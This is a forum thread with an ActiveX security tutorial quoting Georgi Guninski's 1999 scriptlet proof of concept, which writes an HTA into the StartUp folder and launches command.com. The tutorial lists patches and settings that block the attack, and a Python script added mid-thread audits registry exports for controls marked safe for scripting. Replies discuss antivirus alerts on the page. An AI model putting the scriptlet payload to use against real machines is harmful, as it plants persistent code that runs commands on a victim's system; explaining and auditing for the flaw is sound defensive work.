
Thread: ActiveX - a boon or a bane?

  1. #1
    Member
    Join Date
    Nov 2003
    Posts
    33

    Post ActiveX - a boon or a bane?

    It's been quite some time since I visited this site. Well... it's now or never. Time to make a comeback with a little tute.

    Let's get to the point....

    Most of us here know ActiveX, the OLE (Object Linking and Embedding) scripting for Internet browsers. But can anyone think of a way with which you can hijack data? Well, let me introduce you to the sins of ActiveX.

    Let me just introduce you to ActiveX first. The main function of ActiveX that makes it vulnerable is its capability of client-side execution. ActiveX and Java are two of a very few languages that use client-side execution.

    This is how ActiveX works. The ActiveX controls have extensions of .ocx (except those written in Java). These objects are embedded into the browser using the <object> tag. This tag specifies the usage (properties) of the control and also the location of the control on the internet. When the user visits the web page with ActiveX controls, the browser first checks if the control is already in the registry. If not, it'll download the script. Then it executes it, and oh, before execution it checks for Authenticode (coming up). By default the controls are downloaded into the \windows\occache directory. This is where the fun begins: breaking the browser's security and hopping the Authenticode hurdle.

    Microsoft's Authenticode paradigm permits scripts to be executed. This is done with a cryptographic mechanism which involves the browser and a 3rd party (usually VeriSign).

    Let's begin with the bugs. Yeah, yeah. I'm sorry to bug you with the boring part. But hey, it's over.

    ActiveX "Safe for Scripting Issue"

    ActiveX controls usually are harmless functions. But scripts like scriptlet and Eyedog are rather irritating. scriptlet has the capability to sneak into the local filesystem of the user and it can also create, edit and overwrite files. Eyedog can look into your registry.
    Using these two functions, one can create Armagaddon (I've obviously spelled it wrong).

    This safe-for-scripting issue was released by Georgi Guninski in 1999. If you want a taste of this script visit http://www.guninski.com/scrtlb.html . When I say a taste of the code I MEAN a taste of the code. Anyway, what the code does is very simple. The code creates a .hta file in the StartUp folder of the Start menu. So every time you restart the computer, a message pops up. The code goes something like this:

    Code:
    // (every line is prefixed with // so the page itself never runs this)
    //<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
    //</object>
    
    //<SCRIPT>
    //scr.reset();
    //scr.path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
    //scr.doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>"
    //       + "</object>"
    //       + "<SCRIPT>"
    //       + "alert('Written by Georgi Guninski');"
    //       + "wsh.run('C:\\command.com');"
    //       + "</"+"SCRIPT>";
    //scr.write();
    //</SCRIPT>
    Registered ActiveX controls can be marked as "Safe for Scripting" either by implementing IObjectSafety within the control or by marking them as safe in the registry by adding the key 7DD95801-9882-11CF-9FA9-00AA006C42C4 to the Implemented Categories of the control.

    Can you just imagine how many such applications your system uses actively?
    Go to Start->Run->dcomcnfg
    You'll just be shocked seeing the number of ActiveX controls.

    Remember the Eyedog function is only vulnerable if you're using Office 2k. I suppose it has been rectified in XP.

    Avoiding the safe-for-scripting issue:

    Three measures are to be taken in order to protect yourself:

    Step 1:

    Get the relevant patches for Scriptlet/EyeDog from http://www.microsoft.com/technet/sec...n/ms99-032.asp
    and http://www.office.microsoft.com/down.../Uactlsec.aspx respectively.
    But these patches do not provide protection for "accidental Trojans". "Accidental Trojans" are nothing but loopholes not yet found.

    Step 2:

    Change the macro security level setting in all the Office apps (there is no global setting) to Maximum:
    Tools | Macro | Security in Office 2k.

    Step 3:

    This is the most prominent and desperate step you can take. If you don't want to use ActiveX at all, just disable it.
    Tools | Internet Options | Security | Custom Level | Disable Macros.
    As simple as that. And no more ActiveX attacks.

    Man, I'm beat. I never thought 1 vulnerability would take this much. I've got a few more to go. Maybe some other time.
    Till then, Sayonara
    There are 10 kinds of people on Earth.
    Those who know binary and those who don't.

    [flip]4675636B207468652064616D6E20626C6F6F6479206861636B65642D757020776F726C6400[/flip]
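    The post says to open dcomcnfg and be shocked at how many controls are registered, and explains that the registry-side marking for "Safe for Scripting" is the category key 7DD95801-9882-11CF-9FA9-00AA006C42C4 under the control's Implemented Categories. The script below is an added example (not code from the original post or from Guninski) that does the audit offline: it parses the text of a `reg export HKCR\CLSID` dump and lists every CLSID carrying that category, so the controls reachable from a web page are listed rather than eyeballed in dcomcnfg. It also reports whether the CLSID has the IE "kill bit" (Compatibility Flags 0x400 under the ActiveX Compatibility key), which is the mechanism Microsoft uses to block a control in the browser even when it is still registered; the post does not discuss the kill bit. The registry text is constructed for the example, not a real export, and only the scriptlet and WScript.Shell CLSIDs in it come from the post; the third CLSID is made up.

```python
"""Audit a .reg export for ActiveX controls marked Safe for Scripting.

Added example, not from the original post. Input is the text written by
`reg export HKCR\CLSID clsid.reg` (plus, optionally, an export of the IE
ActiveX Compatibility key). Output: every CLSID with the
CATID_SafeForScripting category and whether the kill bit is set for it.
"""
import re

CATID_SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
KILL_BIT = 0x400  # Compatibility Flags bit that blocks the control in IE
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^(?:"([^"]*)"|@)=(.*)$')
_CAT_RE = re.compile(
    r"^HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-F-]{36}\})\\IMPLEMENTED CATEGORIES\\(\{[0-9A-F-]{36}\})$"
)

# Constructed sample export: only the keys needed to show the logic. The
# scriptlet and WScript.Shell CLSIDs are the ones in the post; the third is
# invented. Scriptlet is marked safe-for-scripting and then kill-bitted.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{06290BD5-48AA-11D2-8432-006008C3FBFC}]
@="Scriptlet.TypeLib"

[HKEY_CLASSES_ROOT\CLSID\{06290BD5-48AA-11D2-8432-006008C3FBFC}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}]
@="Windows Script Host Shell Object"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}]
@="Harmless Example Control"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}]
"Compatibility Flags"=dword:00000400
"""


def parse_reg(text):
    """Parse .reg text into {KEY_PATH (upper-cased): {value_name: raw_data}}.

    '@' is the default value. Handles only the subset of .reg syntax the
    audit needs (key headers, string and dword values, comments).
    """
    reg = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).upper()  # registry paths are case-insensitive
            reg.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            reg[current][name] = m.group(2)
    return reg


def _dword(raw):
    """Decode a .reg 'dword:XXXXXXXX' value; None if absent or not a dword."""
    if raw and raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return None


def safe_for_scripting(reg):
    """Return [{clsid, name, kill_bit}] for every CLSID marked safe for scripting."""
    findings = []
    for key in reg:
        m = _CAT_RE.match(key)
        if not m or m.group(2) != CATID_SAFE_FOR_SCRIPTING:
            continue
        clsid = m.group(1)
        name = reg.get(f"HKEY_CLASSES_ROOT\\CLSID\\{clsid}", {}).get("@", "").strip('"')
        flags = _dword(reg.get(f"{COMPAT_KEY}\\{clsid}".upper(), {}).get("Compatibility Flags"))
        findings.append({"clsid": clsid, "name": name, "kill_bit": bool((flags or 0) & KILL_BIT)})
    return sorted(findings, key=lambda f: f["clsid"])


if __name__ == "__main__":
    for f in safe_for_scripting(parse_reg(SAMPLE_REG)):
        status = "kill bit set" if f["kill_bit"] else "EXPOSED to web pages"
        print(f'{f["clsid"]}  {f["name"]:<32} {status}')
```

A control is only reachable from a page if it is marked safe for scripting (by this category key or by IObjectSafety, which this registry audit cannot see) and not kill-bitted, so the "EXPOSED" rows are the ones worth looking at. WScript.Shell is absent from the output because it carries no category key; Guninski's page reaches it through the scriptlet control, which is the whole point of the bug.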

  2. #2
    Very, VERY nicely written and explained. This is a solid proof-of-theory paper, from which I did learn a thing or two, and I applaud your efforts. Sometimes it takes a good slap in the face to show people the vulnerabilities available without proper security measures in place.

    Best of all, you included three basic "quick-fixes" and that's a good sight to see on these forums. A problem explained followed by an explanation.

  3. #3
    Senior Member
    Join Date
    Mar 2004
    Posts
    139

    Wow, my AV is going nuts on this page...
    Could someone explain... it doesn't like some sort of .php script.

    Nice info...

  4. #4
    Member
    Join Date
    Nov 2003
    Posts
    33
    Thanks guys.
    And I didn't quite understand your question.

  5. #5
    Senior Member
    Join Date
    Mar 2004
    Posts
    139

    The code in the post must be active, or at least my AV is reacting to it.
    I think the best way to present code like that in a post is to place comment
    tags in front of each line, i.e. //<Script> ... //scr.reset(); ... at least it's like that in JavaScript,
    and the browser will ignore it. Another one of the possible ways to include nastiness. Surprised the forum let this one ride.

  6. #6
    Senior Member
    Join Date
    Aug 2001
    Posts
    485
    Originally posted here by bluthund

    Wow, my AV is going nuts on this page...
    Could someone explain... it doesn't like some sort of .php script.

    Nice info...
    Yes, mine went ballistic as well, and I don't even have ActiveX enabled !!

    I'm pretty sure it is just picking up on the dodgy code embedded in the original post, though.
    AV scanners are getting more intelligent, and do pick up on a lot of these things, regardless of whether ActiveX is enabled or not.

    After all, the AV scanner can't be sure whether or not this code is about to be executed !!

    EDIT: In my case (McAfee) it was flagged as a potentially unsafe script, which is quite correct!!

  7. #7
    Member
    Join Date
    Nov 2003
    Posts
    33
    Yeah, I already marked it with commenting yesterday itself.
    Does it still react?

  8. #8
    Senior Member
    Join Date
    Aug 2001
    Posts
    485
    Yes, it does still react.

    Technically what you could describe as a false positive, but I'd far rather I had one or two of those, instead of letting something screw my system.

    Your post obviously isn't going to cause any browsers a problem - it's when the AV scanner itself looks at the web page that it gets suspicious. I suspect the issue is that it doesn't realise the code is commented out, but quite correctly doesn't like the look of it in case it is about to be executed.

    Nice post btw, but you have to try a bit harder to trick most AV scanners.

  9. #9
    Finally, a good explanation on a subject that I've been concerned about. Thank you, thank you, thank you.
    severe limitation

  10. #10
    Member
    Join Date
    Nov 2003
    Posts
    33
    Anytime pal, but why so concerned about this topic?
